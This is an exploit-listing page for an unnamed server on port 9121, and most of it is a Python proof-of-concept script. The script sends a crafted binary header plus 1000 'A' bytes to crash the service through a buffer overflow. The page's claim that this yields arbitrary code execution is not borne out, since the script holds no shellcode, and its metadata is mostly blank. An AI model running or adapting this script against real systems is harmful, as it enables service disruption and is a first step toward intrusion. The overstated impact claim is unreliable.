header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Buffer Overflow in Server

This exploit is a buffer overflow vulnerability in a server listening on port 9121. The exploit sends a malicious payload of 1000 bytes to the server, which causes a buffer overflow and allows the attacker to execute arbitrary code on the server.

Mitigation:

The server should be configured to limit the size of the payloads it accepts, and should be regularly patched and updated.
Source

Exploit-DB raw data:

#!/usr/bin/python
import socket
import sys
from struct import pack

try:
  server = sys.argv[1]
  port = 9121
  size = 1000

  inputBuffer = b"\x41" * size

  header =  b"\x75\x19\xba\xab"
  header += b"\x03\x00\x00\x00"
  header += b"\x00\x40\x00\x00"
  header += pack('<I', len(inputBuffer))
  header += pack('<I', len(inputBuffer))
  header += pack('<I', inputBuffer[-1])

  buf = header + inputBuffer 

  print("Sending evil buffer...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((server, port))
  s.send(buf)
  s.close()
  
  print("Done!")
  
except socket.error:
  print("Could not connect!")

Navigation

Suggest Exploit

Services By CQR